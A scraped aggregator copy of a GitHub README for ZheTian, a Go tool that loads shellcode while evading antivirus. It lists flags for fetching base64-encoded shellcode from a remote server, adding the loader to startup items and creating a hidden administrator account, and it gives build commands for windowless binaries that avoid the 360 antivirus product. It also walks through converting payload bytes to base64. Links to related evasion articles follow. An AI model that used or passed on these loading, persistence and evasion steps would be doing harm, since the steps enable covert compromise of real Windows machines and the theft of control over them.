

GitHub - yqcs/ZheTian: ZheTian 免杀shellcode执行程序
source link: https://github.com/yqcs/ZheTian
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

ZheTian
ZheTian Powerful remote load and execute ShellCode tool,免杀shellcode加载框架
-u string:从远程服务器加载base64混淆后的字节码。
-r string:从本地文件内读。
-s string:读取无修改的原始文件,只能从本地加载。
-m boolean:参数为true自动向启动项添加自启模块。
-o boolean:向userHome\tmp目录输出一次性可执行文件,体积比主程序小了五六倍,同理砍去了其他功能,只保留了ShellCode Loader
-n string:向管理员组创建用户,-n的参数即为账户,-p的参数为密码。需以管理员身份运行
-c string:直接从命令行获取base64字符串。如:ZheTian -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M==...
·
如果releases里下载的可执行程序被安全软件查杀了,请下载源码重新编译一份!·
新增命令-o详解:
该命令主要是向用户目录下创建tmp文件夹,然后生产只包含shellcode的程序,体积小了五六倍,极致压缩,并且无任何回显。由于ShellCode写死在了程序内,所以导致用一段时间就会被查杀。
注意使用该命令需填充shellcode,同时拥有go环境。搭配-s、-u、-c、-r其中的任意命令即可,如:ZheTian -s payload.c -o true
Base64字符串方式加载:
原始python代码:
buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75..."
只需提取数组中的16进制代码:
\xfc\x48\x83\xe4\xf0\xe8\xc8\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75...
然后去除\x,得到:
fc4883e4f0e8c88b52208b423c4801d0668178180b0275......
然后使用base64转码,得到:
ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==
c、ruby等同理,Java之流的则是去除 ", 0x"。注意,是逗号空格0x
byte buf[] = new byte[] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41};
获取到base64字符串之后可以选择放到远程服务器加载,使用-u 命令即可。也可以放到本地文件内,或者直接使用-c命令以命令行方式运行。如:ZheTian.exe -c ZmM0ODgzZTRmMGU4Yzg4YjUyMjA4YjQyM2M0ODAxZDA2NjgxNzgxODBiMDI3NQ==
原文件读取类型:
使用 ZheTian -h
命令可查看支持的语言。推荐使用Java、py、C语言。原文件无需进行任何修改即可直接加载,但是不支持放在远程服务器,只能通过本地 -s
命令读取,如: ZheTian -s C:/Windows/Temp/payload.java
图示操作过程
先生成64位shellcode
然后根据需要的命令进行修改
下面执行示例:
go build -ldflags "-w -s" -o ZheTian.exe
go build -ldflags "-w -s -H windowsgui" -o ZheTian.exe
实现无窗口运行。但是360偶尔会识别为恶意程序。如果目标机器无安全设备,可以尝试使用此命令打包,然后使用参数: -o true
实现写入启动项功能。
带图标编译:
先执行:go get github.com/akavel/rsrc
rsrc -manifest ZheTian.manifest -ico favicon.ico -o ZheTian.syso
再执行go build -ldflags "-w -s" -o ZheTian.exe
更多介绍:https://blog.csdn.net/qq_38376348/article/details/108318880
注意:打包的时候需指定是64位还是32位。默认会根据系统自动选择。 而在生成payload shellcode的时候也需要选择正确的位数,否则会加载失败。使用code字节码加载时一定要使用base64加密,否则无法解析!!
有问题可以提Issues,也可加微信联系
Recommend
-
31
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、
-
35
我们在写shellcode时候,做分段免杀执行时,如何做到边解码然后执行再调用解码,解码后再执行?就是分段执行而且解密的密钥是不一样的,对于这个问题,我们应该想想这三个问题。 1、如何写出通用的解码子? 2、如何才能调到...
-
38
绕过ObRegisterCallbacks保护关闭进程 &执行Shellcode原理/代码解析 请输入密码访问本文链接: http://www.8...
-
10
0x00 前言 在上篇文章《通过Boolang语言执行shellcode的...
-
9
0x00 前言 在之前的文章《SILENTTRINITY利用分析》学习了C#利用IronPython引擎从内存加载payload的方法,我在byt3bl33d3r...
-
4
C#免杀之自实现DNS服务器传输shellcodeShare on: 相比于http协议,dns协议有着更好的隐蔽性。类比cs的dns beacon,我们可以自己实现一个dns服务器来传输shellcode。C#拥有一个优秀的第三方库ARSoft.Tools.Net。我们可以使用他...
-
16
摧日:CuiRi 红队专用免杀木马生成工具 0x01 简介: ____ __ __ _____ ______ _____ / ___) ) ) ( ( (_ _) ( __ \ (_ _) / / ( ( ) ) | | ) (__) ) | | ( (...
-
6
Shellcode-Encryptor:一款功能强大的Shellcode加密解密执行工具 Alpha_h4ck 2022-01-19 21:25:42 43919 2
-
7
免杀学习--powershell加载shellcode免杀 - Shu1L's blog Powered by Hexo | Theme - Even ©2015 - 2022...
-
3
这段时间测试了不少免杀的手法,但是对一些加载器的实现原理还没有完全理清,所以本文主要是学习总结原理和姿势,不测试实际免杀效果。 目前来看分离免杀仍然是主流的一种免杀方式,我们可以将shellcode比作子弹,那么枪也就是我们所说的加...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK